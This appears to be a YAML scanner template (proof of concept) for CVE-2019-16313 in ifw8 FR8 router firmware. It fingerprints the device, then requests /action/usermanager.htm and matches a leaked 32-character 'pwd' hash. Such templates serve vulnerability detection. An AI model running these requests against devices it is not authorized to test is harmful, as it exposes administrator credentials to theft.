name: yaml-poc-ifw8-fr8_firmware-unsafe_config-CVE-2019-16313
binding: e7ba04d5-6244-43f1-8d50-7018a011aefa
detail:
    author: system_user
    links:
        - http://www.iwantacve.cn/index.php/archives/311/
        - https://nvd.nist.gov/vuln/detail/CVE-2019-16313
    vulnerability:
        id: d21ce617-0f0e-4371-9669-495479d5368f
        level: high
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /index.htm?PAGE=web
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(b"www.ifw8.cn")
    r1:
        request:
            cache: true
            method: GET
            path: /action/usermanager.htm
            follow_redirects: false
        expression: response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body)
expression: r0() && r1()
